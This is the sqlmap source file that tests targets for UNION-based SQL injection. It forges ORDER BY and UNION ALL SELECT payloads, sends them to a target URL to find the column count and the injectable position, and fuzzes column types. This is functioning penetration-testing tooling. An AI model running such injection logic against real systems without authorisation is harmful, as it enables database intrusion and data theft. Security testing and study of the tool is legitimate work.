Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/lib/techniques/union/test.py
2992 views
1
#!/usr/bin/env python
2
3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7
8
import itertools
9
import logging
10
import random
11
import re
12
13
from lib.core.agent import agent
14
from lib.core.common import average
15
from lib.core.common import Backend
16
from lib.core.common import getPublicTypeMembers
17
from lib.core.common import isNullValue
18
from lib.core.common import listToStrValue
19
from lib.core.common import popValue
20
from lib.core.common import pushValue
21
from lib.core.common import randomInt
22
from lib.core.common import randomStr
23
from lib.core.common import readInput
24
from lib.core.common import removeReflectiveValues
25
from lib.core.common import setTechnique
26
from lib.core.common import singleTimeLogMessage
27
from lib.core.common import singleTimeWarnMessage
28
from lib.core.common import stdev
29
from lib.core.common import wasLastResponseDBMSError
30
from lib.core.compat import xrange
31
from lib.core.data import conf
32
from lib.core.data import kb
33
from lib.core.data import logger
34
from lib.core.data import queries
35
from lib.core.decorators import stackedmethod
36
from lib.core.dicts import FROM_DUMMY_TABLE
37
from lib.core.enums import FUZZ_UNION_COLUMN
38
from lib.core.enums import PAYLOAD
39
from lib.core.settings import FUZZ_UNION_ERROR_REGEX
40
from lib.core.settings import FUZZ_UNION_MAX_COLUMNS
41
from lib.core.settings import LIMITED_ROWS_TEST_NUMBER
42
from lib.core.settings import MAX_RATIO
43
from lib.core.settings import MIN_RATIO
44
from lib.core.settings import MIN_STATISTICAL_RANGE
45
from lib.core.settings import MIN_UNION_RESPONSES
46
from lib.core.settings import NULL
47
from lib.core.settings import ORDER_BY_MAX
48
from lib.core.settings import ORDER_BY_STEP
49
from lib.core.settings import UNION_MIN_RESPONSE_CHARS
50
from lib.core.settings import UNION_STDEV_COEFF
51
from lib.core.unescaper import unescaper
52
from lib.request.comparison import comparison
53
from lib.request.connect import Connect as Request
54
55
def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
56
"""
57
Finds number of columns affected by UNION based injection
58
"""
59
retVal = None
60
61
@stackedmethod
62
def _orderByTechnique(lowerCount=None, upperCount=None):
63
def _orderByTest(cols):
64
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
65
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
66
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
67
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
68
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None
69
70
if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1):
71
infoMsg = "'ORDER BY' technique appears to be usable. "
72
infoMsg += "This should reduce the time needed "
73
infoMsg += "to find the right number "
74
infoMsg += "of query columns. Automatically extending the "
75
infoMsg += "range for current UNION query injection technique test"
76
singleTimeLogMessage(infoMsg)
77
78
lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount
79
found = None
80
while not found:
81
if not conf.uCols and _orderByTest(highCols):
82
lowCols = highCols
83
highCols += ORDER_BY_STEP
84
85
if highCols > ORDER_BY_MAX:
86
break
87
else:
88
while not found:
89
mid = highCols - (highCols - lowCols) // 2
90
if _orderByTest(mid):
91
lowCols = mid
92
else:
93
highCols = mid
94
if (highCols - lowCols) < 2:
95
found = lowCols
96
97
return found
98
99
try:
100
pushValue(kb.errorIsNone)
101
items, ratios = [], []
102
kb.errorIsNone = False
103
lowerCount, upperCount = conf.uColsStart, conf.uColsStop
104
105
if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols): # Note: ORDER BY is not bullet-proof
106
found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique()
107
108
if found:
109
kb.orderByColumns = found
110
infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
111
singleTimeLogMessage(infoMsg)
112
return found
113
elif kb.futileUnion:
114
return None
115
116
if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
117
upperCount = lowerCount + MIN_UNION_RESPONSES
118
119
min_, max_ = MAX_RATIO, MIN_RATIO
120
pages = {}
121
122
for count in xrange(lowerCount, upperCount + 1):
123
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
124
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
125
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
126
127
if not isNullValue(kb.uChar):
128
pages[count] = page
129
130
ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
131
ratios.append(ratio)
132
min_, max_ = min(min_, ratio), max(max_, ratio)
133
items.append((count, ratio))
134
135
if not isNullValue(kb.uChar):
136
value = re.escape(kb.uChar.strip("'"))
137
for regex in (value, r'>\s*%s\s*<' % value):
138
contains = [count for count, content in pages.items() if re.search(regex, content or "", re.IGNORECASE) is not None]
139
if len(contains) == 1:
140
retVal = contains[0]
141
break
142
143
if not retVal:
144
if min_ in ratios:
145
ratios.pop(ratios.index(min_))
146
if max_ in ratios:
147
ratios.pop(ratios.index(max_))
148
149
minItem, maxItem = None, None
150
151
for item in items:
152
if item[1] == min_:
153
minItem = item
154
elif item[1] == max_:
155
maxItem = item
156
157
if all(_ == min_ and _ != max_ for _ in ratios):
158
retVal = maxItem[0]
159
160
elif all(_ != min_ and _ == max_ for _ in ratios):
161
retVal = minItem[0]
162
163
elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
164
deviation = stdev(ratios)
165
166
if deviation is not None:
167
lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
168
169
if min_ < lower:
170
retVal = minItem[0]
171
172
if max_ > upper:
173
if retVal is None or abs(max_ - upper) > abs(min_ - lower):
174
retVal = maxItem[0]
175
finally:
176
kb.errorIsNone = popValue()
177
178
if retVal:
179
infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
180
singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", 'N', infoMsg))
181
182
return retVal
183
184
def _fuzzUnionCols(place, parameter, prefix, suffix):
185
retVal = None
186
187
if Backend.getIdentifiedDbms() and not re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or "") and kb.orderByColumns:
188
comment = queries[Backend.getIdentifiedDbms()].comment.query
189
190
choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True)
191
random.shuffle(choices)
192
193
for candidate in itertools.product(choices, repeat=kb.orderByColumns):
194
if retVal:
195
break
196
elif FUZZ_UNION_COLUMN.STRING not in candidate:
197
continue
198
else:
199
candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in candidate]
200
201
query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix)
202
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
203
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE)
204
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
205
206
if not re.search(FUZZ_UNION_ERROR_REGEX, page or ""):
207
for column in candidate:
208
if column.startswith("'") and column.strip("'") in (page or ""):
209
retVal = [(_ if _ != column else "%s") for _ in candidate]
210
break
211
212
return retVal
213
214
def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
215
validPayload = None
216
vector = None
217
218
positions = [_ for _ in xrange(0, count)]
219
220
# Unbiased approach for searching appropriate usable column
221
random.shuffle(positions)
222
223
for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
224
if vector:
225
break
226
227
# For each column of the table (# of NULL) perform a request using
228
# the UNION ALL SELECT statement to test it the target URL is
229
# affected by an exploitable union SQL injection vulnerability
230
for position in positions:
231
# Prepare expression with delimiters
232
randQuery = randomStr(charCount)
233
phrase = ("%s%s%s" % (kb.chars.start, randQuery, kb.chars.stop)).lower()
234
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
235
randQueryUnescaped = unescaper.escape(randQueryProcessed)
236
237
# Forge the union SQL injection request
238
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
239
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
240
241
# Perform the request
242
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
243
content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()
244
245
if content and phrase in content:
246
validPayload = payload
247
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
248
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate)
249
250
if where == PAYLOAD.WHERE.ORIGINAL:
251
# Prepare expression with delimiters
252
randQuery2 = randomStr(charCount)
253
phrase2 = ("%s%s%s" % (kb.chars.start, randQuery2, kb.chars.stop)).lower()
254
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
255
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
256
257
# Confirm that it is a full union SQL injection
258
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
259
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
260
261
# Perform the request
262
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
263
content = ("%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")).lower()
264
265
if not all(_ in content for _ in (phrase, phrase2)):
266
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)
267
elif not kb.unionDuplicates:
268
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
269
270
# Check for limited row output
271
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
272
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
273
274
# Perform the request
275
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
276
content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()
277
if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
278
warnMsg = "output with limited number of rows detected. Switching to partial mode"
279
logger.warning(warnMsg)
280
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)
281
282
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
283
284
if unionErrorCase and count > 1:
285
warnMsg = "combined UNION/error-based SQL injection case found on "
286
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
287
warnMsg += "column with better characteristics"
288
logger.warning(warnMsg)
289
else:
290
break
291
292
return validPayload, vector
293
294
def _unionConfirm(comment, place, parameter, prefix, suffix, count):
295
validPayload = None
296
vector = None
297
298
# Confirm the union SQL injection and get the exact column
299
# position which can be used to extract data
300
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)
301
302
# Assure that the above function found the exploitable full union
303
# SQL injection position
304
if not validPayload:
305
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
306
307
return validPayload, vector
308
309
def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
310
"""
311
This method tests if the target URL is affected by an union
312
SQL injection vulnerability. The test is done up to 50 columns
313
on the target database table
314
"""
315
316
validPayload = None
317
vector = None
318
orderBy = kb.orderByColumns
319
uChars = (conf.uChar, kb.uChar)
320
where = PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE
321
322
# In case that user explicitly stated number of columns affected
323
if conf.uColsStop == conf.uColsStart:
324
count = conf.uColsStart
325
else:
326
count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where)
327
328
if count:
329
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
330
331
if not all((validPayload, vector)) and not all((conf.uChar, conf.dbms, kb.unionTemplate)):
332
if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS:
333
if kb.fuzzUnionTest is None:
334
msg = "do you want to (re)try to find proper "
335
msg += "UNION column types with fuzzy test? [y/N] "
336
337
kb.fuzzUnionTest = readInput(msg, default='N', boolean=True)
338
if kb.fuzzUnionTest:
339
kb.unionTemplate = _fuzzUnionCols(place, parameter, prefix, suffix)
340
341
warnMsg = "if UNION based SQL injection is not detected, "
342
warnMsg += "please consider "
343
344
if not conf.uChar and count > 1 and kb.uChar == NULL and conf.uValues is None:
345
message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "
346
347
if not readInput(message, default='Y', boolean=True):
348
warnMsg += "usage of option '--union-char' "
349
warnMsg += "(e.g. '--union-char=1') "
350
else:
351
conf.uChar = kb.uChar = str(randomInt(2))
352
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
353
354
if not conf.dbms:
355
if not conf.uChar:
356
warnMsg += "and/or try to force the "
357
else:
358
warnMsg += "forcing the "
359
warnMsg += "back-end DBMS (e.g. '--dbms=mysql') "
360
361
if not all((validPayload, vector)) and not warnMsg.endswith("consider "):
362
singleTimeWarnMessage(warnMsg)
363
364
if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)): # discard ORDER BY results (not usable - e.g. maybe invalid altogether)
365
conf.uChar, kb.uChar = uChars
366
validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
367
368
return validPayload, vector
369
370
@stackedmethod
371
def unionTest(comment, place, parameter, value, prefix, suffix):
372
"""
373
This method tests if the target URL is affected by an union
374
SQL injection vulnerability. The test is done up to 3*50 times
375
"""
376
377
if conf.direct:
378
return
379
380
negativeLogic = kb.negativeLogic
381
setTechnique(PAYLOAD.TECHNIQUE.UNION)
382
383
try:
384
if negativeLogic:
385
pushValue(kb.negativeLogic)
386
pushValue(conf.string)
387
pushValue(conf.code)
388
389
kb.negativeLogic = False
390
conf.string = conf.code = None
391
392
validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
393
finally:
394
if negativeLogic:
395
conf.code = popValue()
396
conf.string = popValue()
397
kb.negativeLogic = popValue()
398
399
if validPayload:
400
validPayload = agent.removePayloadDelimiters(validPayload)
401
402
return validPayload, vector
403
404